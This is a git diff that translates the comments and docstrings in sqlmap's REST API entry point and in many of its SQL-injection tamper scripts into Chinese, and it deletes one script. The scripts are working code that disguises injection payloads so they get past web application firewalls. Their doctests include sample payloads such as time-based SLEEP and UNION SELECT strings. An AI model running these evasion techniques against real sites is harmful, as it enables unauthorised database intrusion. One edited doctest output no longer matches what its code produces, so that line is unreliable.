-    apiparser.add_argument("--adapter", help="Server (bottle) adapter to use (default \"%s\")" % RESTAPI_DEFAULT_ADAPTER, default=RESTAPI_DEFAULT_ADAPTER)
-    apiparser.add_argument("--database", help="Set IPC database filepath (optional)")
-    apiparser.add_argument("--username", help="Basic authentication username (optional)")
-    apiparser.add_argument("--password", help="Basic authentication password (optional)")
-    (args, _) = apiparser.parse_known_args() if hasattr(apiparser, "parse_known_args") else apiparser.parse_args()
-
+    apiparser = ArgumentParser()  # 创建一个ArgumentParser对象，用于解析命令行参数
+    apiparser.add_argument("-s", "--server", help="Run as a REST-JSON API server", action="store_true")  # 添加一个命令行选项，用于启动服务器
+    apiparser.add_argument("-c", "--client", help="Run as a REST-JSON API client", action="store_true")  # 添加一个命令行选项，用于启动客户端
+    apiparser.add_argument("-H", "--host", help="Host of the REST-JSON API server (default \"%s\")" % RESTAPI_DEFAULT_ADDRESS, default=RESTAPI_DEFAULT_ADDRESS)  # 添加一个命令行选项，用于指定服务器主机地址，默认值为RESTAPI_DEFAULT_ADDRESS
+    apiparser.add_argument("-p", "--port", help="Port of the REST-JSON API server (default %d)" % RESTAPI_DEFAULT_PORT, default=RESTAPI_DEFAULT_PORT, type=int)  # 添加一个命令行选项，用于指定服务器端口，默认值为RESTAPI_DEFAULT_PORT
+    apiparser.add_argument("--adapter", help="Server (bottle) adapter to use (default \"%s\")" % RESTAPI_DEFAULT_ADAPTER, default=RESTAPI_DEFAULT_ADAPTER)  # 添加一个命令行选项，用于指定服务器适配器，默认值为RESTAPI_DEFAULT_ADAPTER
+    apiparser.add_argument("--database", help="Set IPC database filepath (optional)")  # 添加一个命令行选项，用于指定IPC数据库文件路径（可选）
+    apiparser.add_argument("--username", help="Basic authentication username (optional)")  # 添加一个命令行选项，用于指定基本认证的用户名（可选）
+    apiparser.add_argument("--password", help="Basic authentication password (optional)")  # 添加一个命令行选项，用于指定基本认证的密码（可选）
+    (args, _) = apiparser.parse_known_args() if hasattr(apiparser, "parse_known_args") else apiparser.parse_args()  # 解析命令行参数，如果支持parse_known_args方法则使用它，否则使用parse_args方法
 
     # Start the client or the server
-    if args.server:
-        server(args.host, args.port, adapter=args.adapter, username=args.username, password=args.password, database=args.database)
-    elif args.client:
-        client(args.host, args.port, username=args.username, password=args.password)
-    else:
-        apiparser.print_help()
-
-if __name__ == "__main__":
-    main()
+    if args.server:  # 如果命令行参数中指定了启动服务器
+        server(args.host, args.port, adapter=args.adapter, username=args.username, password=args.password, database=args.database)  # 调用server函数启动服务器
+    elif args.client:  # 如果命令行参数中指定了启动客户端
+        client(args.host, args.port, username=args.username, password=args.password)  # 调用client函数启动客户端
+    else:  # 如果未指定启动服务器或客户端
+        apiparser.print_help()  # 打印命令行帮助信息
+
+if __name__ == "__main__":  # 如果当前脚本作为主程序运行
+    main()  # 调用main函数
diff --git a/src/sqlmap-master/tamper/0eunion.py b/src/sqlmap-master/tamper/0eunion.py
index 9342053..aee154a 100644
--- a/src/sqlmap-master/tamper/0eunion.py
+++ b/src/sqlmap-master/tamper/0eunion.py
@@ -9,24 +9,35 @@ import re
 
 from lib.core.enums import PRIORITY
 
-__priority__ = PRIORITY.HIGHEST
+__priority__ = PRIORITY.HIGHEST # 设置优先级为最高
 
 def dependencies():
     pass
 
 def tamper(payload, **kwargs):
     """
-    Replaces instances of <int> UNION with <int>e0UNION
-
-    Requirement:
-        * MySQL
-        * MsSQL
-
-    Notes:
-        * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf
-
-    >>> tamper('1 UNION ALL SELECT')
-    '1e0UNION ALL SELECT'
+    这个函数用于篡改（tamper）输入的payload，以绕过某些安全防护措施。
+    
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
+    
+    功能：
+        将payload中的<int> UNION替换为<int>e0UNION，以尝试绕过安全防护。
+    
+    要求：
+        * 适用于MySQL和MsSQL数据库。
+    
+    注意：
+        * 参考文档：https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf 
+        * 该函数假设输入的payload是有效的，并且不进行任何错误处理。
+    
+    示例：
+        >>> tamper('1 UNION ALL SELECT')
+        '1e0UNION ALL SELECT'
     """
+    
+    # 使用正则表达式替换payload中的数字和UNION之间的空格为'e0'
+    # \g<1>表示匹配的第一个括号中的内容，\g<2>表示第二个括号中的内容
 
     return re.sub(r"(?i)(\d+)\s+(UNION )", r"\g<1>e0\g<2>", payload) if payload else payload
diff --git a/src/sqlmap-master/tamper/apostrophemask.py b/src/sqlmap-master/tamper/apostrophemask.py
index 113b5bf..0eaf56e 100644
--- a/src/sqlmap-master/tamper/apostrophemask.py
+++ b/src/sqlmap-master/tamper/apostrophemask.py
@@ -7,23 +7,31 @@ See the file 'LICENSE' for copying permission
 
 from lib.core.enums import PRIORITY
 
-__priority__ = PRIORITY.LOWEST
+__priority__ = PRIORITY.LOWEST# 设置优先级为最低
 
 def dependencies():
     pass
 
 def tamper(payload, **kwargs):
     """
-    Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87)
+    这个函数用于篡改（tamper）输入的payload，将其中的单引号字符（'）替换为其UTF-8全角字符对应物。
 
-    References:
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
+
+    功能：
+        将payload中的单引号（'）替换为UTF-8编码的全角单引号（%EF%BC%87），用于绕过某些安全防护措施。
+
+    参考链接：
         * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128
         * https://web.archive.org/web/20130614183121/http://lukasz.pilorz.net/testy/unicode_conversion/
         * https://web.archive.org/web/20131121094431/sla.ckers.org/forum/read.php?13,11562,11850
         * https://web.archive.org/web/20070624194958/http://lukasz.pilorz.net/testy/full_width_utf/index.phps
 
-    >>> tamper("1 AND '1'='1")
-    '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
+    示例：
+        >>> tamper("1 AND '1'='1")
+        '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
     """
-
+    # 替换payload中的单引号为UTF-8全角单引号
     return payload.replace('\'', "%EF%BC%87") if payload else payload
diff --git a/src/sqlmap-master/tamper/apostrophenullencode.py b/src/sqlmap-master/tamper/apostrophenullencode.py
index 7a3cd18..d850c00 100644
--- a/src/sqlmap-master/tamper/apostrophenullencode.py
+++ b/src/sqlmap-master/tamper/apostrophenullencode.py
@@ -7,17 +7,29 @@ See the file 'LICENSE' for copying permission
 
 from lib.core.enums import PRIORITY
 
-__priority__ = PRIORITY.LOWEST
+__priority__ = PRIORITY.LOWEST# 设置优先级为最低
 
 def dependencies():
+    """
+    这个函数用于定义依赖关系，但在当前脚本中未实现任何功能。
+    通常，这个函数用于检查当前函数所需的依赖是否满足。
+    """
     pass
 
 def tamper(payload, **kwargs):
     """
-    Replaces apostrophe character (') with its illegal double unicode counterpart (e.g. ' -> %00%27)
+    这个函数用于篡改（tamper）输入的payload，将其中的单引号字符（'）替换为其非法的双Unicode编码对应物。
+
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
+
+    功能：
+        将payload中的单引号（'）替换为%00%27，这是一种非法的Unicode编码方式，用于绕过某些安全防护措施。
 
-    >>> tamper("1 AND '1'='1")
-    '1 AND %00%271%00%27=%00%271'
+    示例：
+        >>> tamper("1 AND '1'='1")
+        '1 AND %00%271%00%27=%00%271'
     """
 
-    return payload.replace('\'', "%00%27") if payload else payload
+    return payload.replace('\'', "%00%27") if payload else payload # 替换payload中的单引号为%00%27
diff --git a/src/sqlmap-master/tamper/appendnullbyte.py b/src/sqlmap-master/tamper/appendnullbyte.py
index 5fda08b..2493e70 100644
--- a/src/sqlmap-master/tamper/appendnullbyte.py
+++ b/src/sqlmap-master/tamper/appendnullbyte.py
@@ -15,23 +15,30 @@ __priority__ = PRIORITY.LOWEST
 
 def dependencies():
     singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.ACCESS))
-
+    # 显示警告信息，指出该tamper脚本仅适用于Microsoft Access数据库
 def tamper(payload, **kwargs):
     """
-    Appends (Access) NULL byte character (%00) at the end of payload
+    这个函数用于篡改（tamper）输入的payload，通过在末尾添加一个NULL字节（%00）。
+
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
+
+    功能：
+        在payload的末尾添加一个NULL字节（%00），这在对付某些弱Web应用防火墙时非常有用，特别是当后端数据库管理系统是Microsoft Access时。
 
-    Requirement:
-        * Microsoft Access
+    要求：
+        * 仅适用于Microsoft Access数据库。
 
-    Notes:
-        * Useful to bypass weak web application firewalls when the back-end
-          database management system is Microsoft Access - further uses are
-          also possible
+    注意：
+        * 这种技术除了可以绕过Web应用防火墙外，还有其他可能的用途。
 
-    Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection
+    参考链接：
+        * http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection
 
-    >>> tamper('1 AND 1=1')
-    '1 AND 1=1%00'
+    示例：
+        >>> tamper('1 AND 1=1')
+        '1 AND 1=1%00'
     """
 
-    return "%s%%00" % payload if payload else payload
+    return "%s%%00" % payload if payload else payload # 如果payload不为空，则在其末尾添加NULL字节（%00）
diff --git a/src/sqlmap-master/tamper/base64encode.py b/src/sqlmap-master/tamper/base64encode.py
index 9e81dc9..ff35fd2 100644
--- a/src/sqlmap-master/tamper/base64encode.py
+++ b/src/sqlmap-master/tamper/base64encode.py
@@ -5,20 +5,28 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
-from lib.core.convert import encodeBase64
-from lib.core.enums import PRIORITY
+from lib.core.convert import encodeBase64 # 导入Base64编码函数
+from lib.core.enums import PRIORITY # 导入优先级枚举
 
-__priority__ = PRIORITY.LOW
+__priority__ = PRIORITY.LOW # 设置优先级为低
 
 def dependencies():
     pass
 
 def tamper(payload, **kwargs):
-    """
-    Base64-encodes all characters in a given payload
+     """
+    这个函数用于篡改（tamper）输入的payload，将所有字符进行Base64编码。
+
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
+
+    功能：
+        对输入的payload进行Base64编码，这可以用于绕过某些对特殊字符有限制的安全防护措施。
 
-    >>> tamper("1' AND SLEEP(5)#")
-    'MScgQU5EIFNMRUVQKDUpIw=='
+    示例：
+        >>> tamper("1' AND SLEEP(5)#")
+        'MScgQU5EIFNMRUVQKDUpIw=='
     """
 
-    return encodeBase64(payload, binary=False) if payload else payload
+    return encodeBase64(payload, binary=False) if payload else payload # 如果payload不为空，则对其进行Base64编码，binary=False表示结果为ASCII字符串
diff --git a/src/sqlmap-master/tamper/between.py b/src/sqlmap-master/tamper/between.py
index d07e224..41fd980 100644
--- a/src/sqlmap-master/tamper/between.py
+++ b/src/sqlmap-master/tamper/between.py
@@ -16,44 +16,46 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #'
+    这个函数用于篡改（tamper）输入的payload，将大于操作符（'>）替换为'NOT BETWEEN 0 AND #'，将等于操作符（'='）替换为'BETWEEN # AND #'。
 
-    Tested against:
-        * Microsoft SQL Server 2005
-        * MySQL 4, 5.0 and 5.5
+    测试情况：
+        * 微软 SQL Server 2005
+        * MySQL 4, 5.0 和 5.5
         * Oracle 10g
         * PostgreSQL 8.3, 8.4, 9.0
 
-    Notes:
-        * Useful to bypass weak and bespoke web application firewalls that
-          filter the greater than character
-        * The BETWEEN clause is SQL standard. Hence, this tamper script
-          should work against all (?) databases
-
-    >>> tamper('1 AND A > B--')
-    '1 AND A NOT BETWEEN 0 AND B--'
-    >>> tamper('1 AND A = B--')
-    '1 AND A BETWEEN B AND B--'
-    >>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()')
-    '1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()'
+    注意：
+        * 这个替换很有用，可以绕过那些只过滤大于字符的弱Web应用防火墙。
+        * BETWEEN子句是SQL标准。因此，这个tamper脚本应该适用于所有数据库。
+
+    示例：
+        >>> tamper('1 AND A > B--')
+        '1 AND A NOT BETWEEN 0 AND B--'
+        >>> tamper('1 AND A = B--')
+        '1 AND A BETWEEN B AND B--'
+        >>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()')
+        '1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()'
     """
 
-    retVal = payload
 
-    if payload:
+    retVal = payload # 初始化返回值
+
+    if payload:# 如果payload不为空
+        # 使用正则表达式查找并替换大于操作符（'>）
         match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload)
 
-        if match:
+        if match: # 如果找到匹配项
             _ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5))
-            retVal = retVal.replace(match.group(0), _)
+            retVal = retVal.replace(match.group(0), _) # 替换匹配项
         else:
-            retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload)
+            retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload) # 替换大于操作符
 
-        if retVal == payload:
+        if retVal == payload: # 如果返回值未改变，尝试替换等于操作符（'=）
             match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^=]+?)\s*=\s*([\w()]+)\s*", payload)
 
-            if match:
+            if match:# 如果找到匹配项
                 _ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5))
-                retVal = retVal.replace(match.group(0), _)
+                retVal = retVal.replace(match.group(0), _)# 替换匹配项
+
 
-    return retVal
+    return retVal# 返回篡改后的payload
diff --git a/src/sqlmap-master/tamper/binary.py b/src/sqlmap-master/tamper/binary.py
index b0151a3..023047f 100644
--- a/src/sqlmap-master/tamper/binary.py
+++ b/src/sqlmap-master/tamper/binary.py
@@ -16,28 +16,29 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    Injects keyword binary where possible
-
-    Requirement:
-        * MySQL
-
-    >>> tamper('1 UNION ALL SELECT NULL, NULL, NULL')
-    '1 UNION ALL SELECT binary NULL, binary NULL, binary NULL'
-    >>> tamper('1 AND 2>1')
-    '1 AND binary 2>binary 1'
-    >>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END')
-    'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END'
+    这个函数用于篡改（tamper）输入的payload，注入MySQL中的关键字'binary'，以尝试绕过某些安全防护措施。
+
+    要求：
+        * 仅适用于MySQL数据库。
+
+    示例：
+        >>> tamper('1 UNION ALL SELECT NULL, NULL, NULL')
+        '1 UNION ALL SELECT binary NULL, binary NULL, binary NULL'
+        >>> tamper('1 AND 2>1')
+        '1 AND binary 2>binary 1'
+        >>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END')
+        'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END'
     """
 
-    retVal = payload
+    retVal = payload # 初始化返回值
 
-    if payload:
-        retVal = re.sub(r"\bNULL\b", "binary NULL", retVal)
-        retVal = re.sub(r"\b(THEN\s+)(\d+|0x[0-9a-f]+)(\s+ELSE\s+)(\d+|0x[0-9a-f]+)", r"\g<1>binary \g<2>\g<3>binary \g<4>", retVal)
-        retVal = re.sub(r"(\d+\s*[>=]\s*)(\d+)", r"binary \g<1>binary \g<2>", retVal)
-        retVal = re.sub(r"\b((AND|OR)\s*)(\d+)", r"\g<1>binary \g<3>", retVal)
-        retVal = re.sub(r"([>=]\s*)(\d+)", r"\g<1>binary \g<2>", retVal)
-        retVal = re.sub(r"\b(0x[0-9a-f]+)", r"binary \g<1>", retVal)
-        retVal = re.sub(r"(\s+binary)+", r"\g<1>", retVal)
+    if payload: # 如果payload不为空
+        retVal = re.sub(r"\bNULL\b", "binary NULL", retVal) # 替换NULL为binary NULL
+        retVal = re.sub(r"\b(THEN\s+)(\d+|0x[0-9a-f]+)(\s+ELSE\s+)(\d+|0x[0-9a-f]+)", r"\g<1>binary \g<2>\g<3>binary \g<4>", retVal)# 在THEN和ELSE后的数字或十六进制值前添加binary关键字
+        retVal = re.sub(r"(\d+\s*[>=]\s*)(\d+)", r"binary \g<1>binary \g<2>", retVal)# 在数字比较操作中添加binary关键字
+        retVal = re.sub(r"\b((AND|OR)\s*)(\d+)", r"\g<1>binary \g<3>", retVal)# 在AND或OR条件后的数字前添加binary关键字
+        retVal = re.sub(r"([>=]\s*)(\d+)", r"\g<1>binary \g<2>", retVal)# 在比较操作符前的数字前添加binary关键字
+        retVal = re.sub(r"\b(0x[0-9a-f]+)", r"binary \g<1>", retVal)  # 在十六进制值前添加binary关键字
+        retVal = re.sub(r"(\s+binary)+", r"\g<1>", retVal) # 移除多余的binary关键字
 
-    return retVal
+    return retVal # 返回篡改后的payload
diff --git a/src/sqlmap-master/tamper/bluecoat.py b/src/sqlmap-master/tamper/bluecoat.py
index 7438d30..46e34e5 100644
--- a/src/sqlmap-master/tamper/bluecoat.py
+++ b/src/sqlmap-master/tamper/bluecoat.py
@@ -5,11 +5,12 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
-import re
+import re# 导入正则表达式模块
 
-from lib.core.data import kb
-from lib.core.enums import PRIORITY
+from lib.core.data import kb  # 导入知识库（包含SQL关键字等信息）
+from lib.core.enums import PRIORITY # 导入优先级枚举
 
+# 设置优先级为普通
 __priority__ = PRIORITY.NORMAL
 
 def dependencies():
@@ -17,34 +18,45 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    Replaces space character after SQL statement with a valid random blank character. Afterwards replace character '=' with operator LIKE
+    这个函数用于篡改（tamper）输入的payload，通过替换空格字符和等号来绕过Blue Coat SGOS的WAF。
 
-    Requirement:
-        * Blue Coat SGOS with WAF activated as documented in
-        https://kb.bluecoat.com/index?page=content&id=FAQ2147
+    功能：
+        * 将SQL语句后的空格替换为有效的随机空白字符。
+        * 将等号（=）替换为LIKE操作符。
 
-    Tested against:
+    要求：
+        * Blue Coat SGOS，且WAF已激活，参考文档：https://kb.bluecoat.com/index?page=content&id=FAQ2147
+
+    测试情况：
         * MySQL 5.1, SGOS
 
-    Notes:
-        * Useful to bypass Blue Coat's recommended WAF rule configuration
+    注意：
+        * 这个篡改方法对于绕过Blue Coat推荐的WAF规则配置很有用。
 
-    >>> tamper('SELECT id FROM users WHERE id = 1')
-    'SELECT%09id FROM%09users WHERE%09id LIKE 1'
+    示例：
+        >>> tamper('SELECT id FROM users WHERE id = 1')
+        'SELECT%09id FROM%09users WHERE%09id LIKE 1'
     """
 
     def process(match):
+        """
+        辅助函数，用于处理正则匹配的结果。
+        将匹配到的SQL关键字替换为带有%09（制表符）的版本。
+        """
         word = match.group('word')
         if word.upper() in kb.keywords:
             return match.group().replace(word, "%s%%09" % word)
         else:
             return match.group()
 
-    retVal = payload
+    retVal = payload # 初始化返回值
 
     if payload:
+        # 替换SQL关键字后跟非单词字符或字符串末尾的空格
         retVal = re.sub(r"\b(?P<word>[A-Z_]+)(?=[^\w(]|\Z)", process, retVal)
+         # 将等号替换为LIKE操作符
         retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
+        # 移除多余的%09空格
         retVal = retVal.replace("%09 ", "%09")
 
     return retVal
diff --git a/src/sqlmap-master/tamper/chardoubleencode.py b/src/sqlmap-master/tamper/chardoubleencode.py
deleted file mode 100644
index ea711b4..0000000
--- a/src/sqlmap-master/tamper/chardoubleencode.py
+++ /dev/null
@@ -1,42 +0,0 @@
-#!/usr/bin/env python
-
-"""
-Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
-See the file 'LICENSE' for copying permission
-"""
-
-import string
-
-from lib.core.enums import PRIORITY
-
-__priority__ = PRIORITY.LOW
-
-def dependencies():
-    pass
-
-def tamper(payload, **kwargs):
-    """
-    Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554)
-
-    Notes:
-        * Useful to bypass some weak web application firewalls that do not double URL-decode the request before processing it through their ruleset
-
-    >>> tamper('SELECT FIELD FROM%20TABLE')
-    '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
-    """
-
-    retVal = payload
-
-    if payload:
-        retVal = ""
-        i = 0
-
-        while i < len(payload):
-            if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
-                retVal += '%%25%s' % payload[i + 1:i + 3]
-                i += 3
-            else:
-                retVal += '%%25%.2X' % ord(payload[i])
-                i += 1
-
-    return retVal
diff --git a/src/sqlmap-master/tamper/charencode.py b/src/sqlmap-master/tamper/charencode.py
index 181f978..6806af2 100644
--- a/src/sqlmap-master/tamper/charencode.py
+++ b/src/sqlmap-master/tamper/charencode.py
@@ -5,45 +5,54 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
-import string
+import string  # 导入字符串常量库，用于处理字符和十六进制数字
 
-from lib.core.enums import PRIORITY
+from lib.core.enums import PRIORITY  # 从核心库导入优先级枚举
 
-__priority__ = PRIORITY.LOWEST
+__priority__ = PRIORITY.LOWEST# 设置优先级为最低
 
 def dependencies():
     pass
 
 def tamper(payload, **kwargs):
     """
-    URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54)
+    这个函数用于篡改（tamper）输入的payload，通过URL编码所有字符（不处理已经编码的字符）。
 
-    Tested against:
+    功能：
+        * 将输入的SQL语句中的所有字符进行URL编码。
+        * 例如，将'SELECT'转换为'%53%45%4C%45%43%54'。
+
+    测试情况：
         * Microsoft SQL Server 2005
-        * MySQL 4, 5.0 and 5.5
+        * MySQL 4, 5.0 和 5.5
         * Oracle 10g
         * PostgreSQL 8.3, 8.4, 9.0
 
-    Notes:
-        * Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset
-        * The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS
+    注意：
+        * 这个方法对于绕过一些非常弱的Web应用防火墙很有用，这些防火墙在处理请求时不进行URL解码。
+        * Web服务器会传递解码后的版本，因此应该适用于任何数据库管理系统（DBMS）。
 
-    >>> tamper('SELECT FIELD FROM%20TABLE')
-    '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
+    示例：
+        >>> tamper('SELECT FIELD FROM%20TABLE')
+        '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
     """
 
-    retVal = payload
 
-    if payload:
-        retVal = ""
-        i = 0
+    retVal = payload  # 初始化返回值为输入的payload
 
+    if payload:  # 如果payload不为空
+        retVal = ""  # 初始化返回值字符串
+        i = 0  # 初始化索引
+        # 遍历payload中的每个字符
         while i < len(payload):
+            # 检查当前字符是否为%且后面两个字符是十六进制数字（已编码的字符）
             if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
-                retVal += payload[i:i + 3]
-                i += 3
+                retVal += payload[i:i + 3]  # 如果是已编码的字符，直接添加到返回值
+                i += 3  # 移动索引，跳过已处理的三个字符
             else:
-                retVal += '%%%.2X' % ord(payload[i])
-                i += 1
+                  # 对未编码的字符进行URL编码，并添加到返回值
+                retVal += '%%%.2X' % ord(payload[i])# 将字符转换为其ASCII值的十六进制表示
+                i += 1  # 移动索引，处理下一个字符
+
 
-    return retVal
+    return retVal  # 返回篡改后的payload
diff --git a/src/sqlmap-master/tamper/charunicodeencode.py b/src/sqlmap-master/tamper/charunicodeencode.py
index 6e8b429..c8f72ce 100644
--- a/src/sqlmap-master/tamper/charunicodeencode.py
+++ b/src/sqlmap-master/tamper/charunicodeencode.py
@@ -8,46 +8,62 @@ See the file 'LICENSE' for copying permission
 import os
 import string
 
-from lib.core.common import singleTimeWarnMessage
-from lib.core.enums import PRIORITY
+from lib.core.common import singleTimeWarnMessage  # 从核心库导入单次警告消息函数
+from lib.core.enums import PRIORITY  # 从核心库导入优先级枚举
 
-__priority__ = PRIORITY.LOWEST
+__priority__ = PRIORITY.LOWEST # 设置优先级为最低
 
 def dependencies():
+    """
+    这个函数用于在运行时检查依赖关系，并给出警告信息。
+
+    功能：
+    - 显示一条单次警告消息，指出当前的tamper脚本仅适用于ASP或ASP.NET Web应用程序。
+    """
     singleTimeWarnMessage("tamper script '%s' is only meant to be run against ASP or ASP.NET web applications" % os.path.basename(__file__).split(".")[0])
 
 def tamper(payload, **kwargs):
     """
-    Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054)
+    这个函数用于篡改（tamper）输入的payload，通过Unicode-URL编码所有字符（不处理已经编码的字符）。
+
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
+
+    功能：
+        - 将输入的payload中的字符转换为Unicode-URL编码格式（例如，'SELECT'转换为'%u0053%u0045%u004C%u0045%u0043%u0054'）。
 
-    Requirement:
-        * ASP
-        * ASP.NET
+    要求：
+        * 仅适用于ASP和ASP.NET环境。
 
-    Tested against:
+    测试情况：
         * Microsoft SQL Server 2000
         * Microsoft SQL Server 2005
         * MySQL 5.1.56
         * PostgreSQL 9.0.3
 
-    Notes:
-        * Useful to bypass weak web application firewalls that do not unicode URL-decode the request before processing it through their ruleset
+    注意：
+        * 这个篡改方法对于绕过那些在处理请求前不进行Unicode URL解码的弱Web应用防火墙很有用。
 
-    >>> tamper('SELECT FIELD%20FROM TABLE')
-    '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
+    示例：
+        >>> tamper('SELECT FIELD%20FROM TABLE')
+        '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
     """
 
-    retVal = payload
+    retVal = payload  # 初始化返回值为输入的payload
 
-    if payload:
-        retVal = ""
-        i = 0
+    if payload:  # 如果payload不为空
+        retVal = ""  # 初始化返回值字符串
+        i = 0  # 初始化索引
 
+        # 遍历payload中的每个字符
         while i < len(payload):
+                # 如果当前字符是%且后面两个字符是十六进制数字（已编码的字符），则进行Unicode-URL编码
             if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
                 retVal += "%%u00%s" % payload[i + 1:i + 3]
                 i += 3
             else:
+                # 对未编码的字符进行Unicode-URL编码，并添加到返回值
                 retVal += '%%u%.4X' % ord(payload[i])
                 i += 1
 
diff --git a/src/sqlmap-master/tamper/charunicodeescape.py b/src/sqlmap-master/tamper/charunicodeescape.py
index 8fe05c0..41d47a6 100644
--- a/src/sqlmap-master/tamper/charunicodeescape.py
+++ b/src/sqlmap-master/tamper/charunicodeescape.py
@@ -5,35 +5,48 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
-import string
+import string  # 导入字符串常量库，用于处理字符和十六进制数字
 
-from lib.core.enums import PRIORITY
+from lib.core.enums import PRIORITY  # 从核心库导入优先级枚举
 
+# 设置优先级为普通
 __priority__ = PRIORITY.NORMAL
 
 def tamper(payload, **kwargs):
     """
-    Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054)
+    这个函数用于篡改（tamper）输入的payload，通过Unicode转义非编码字符（不处理已经编码的字符）。
 
-    Notes:
-        * Useful to bypass weak filtering and/or WAFs in JSON contexes
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
 
-    >>> tamper('SELECT FIELD FROM TABLE')
-    '\\\\u0053\\\\u0045\\\\u004C\\\\u0045\\\\u0043\\\\u0054\\\\u0020\\\\u0046\\\\u0049\\\\u0045\\\\u004C\\\\u0044\\\\u0020\\\\u0046\\\\u0052\\\\u004F\\\\u004D\\\\u0020\\\\u0054\\\\u0041\\\\u0042\\\\u004C\\\\u0045'
+    功能：
+        - 将输入的payload中的字符转换为Unicode转义序列（例如，'SELECT'转换为'\u0053\u0045\u004C\u0045\u0043\u0054'）。
+
+    注意：
+        * 这个方法对于绕过在JSON上下文中的弱过滤和/或Web应用防火墙（WAFs）很有用。
+
+    示例：
+        >>> tamper('SELECT FIELD FROM TABLE')
+        '\\u0053\\u0045\\u004C\\u0045\\u0043\\u0054 \\u0020\\u0046\\u0049\\u0045\\u004C\\u0044 \\u0046\\u0052\\u004F\\u004D \\u0054\\u0041\\u0042\\u004C\\u0045'
     """
 
-    retVal = payload
+    retVal = payload  # 初始化返回值为输入的payload
+
 
-    if payload:
-        retVal = ""
-        i = 0
+    if payload:  # 如果payload不为空
+        retVal = ""  # 初始化返回值字符串
+        i = 0  # 初始化索引
 
+        # 遍历payload中的每个字符
         while i < len(payload):
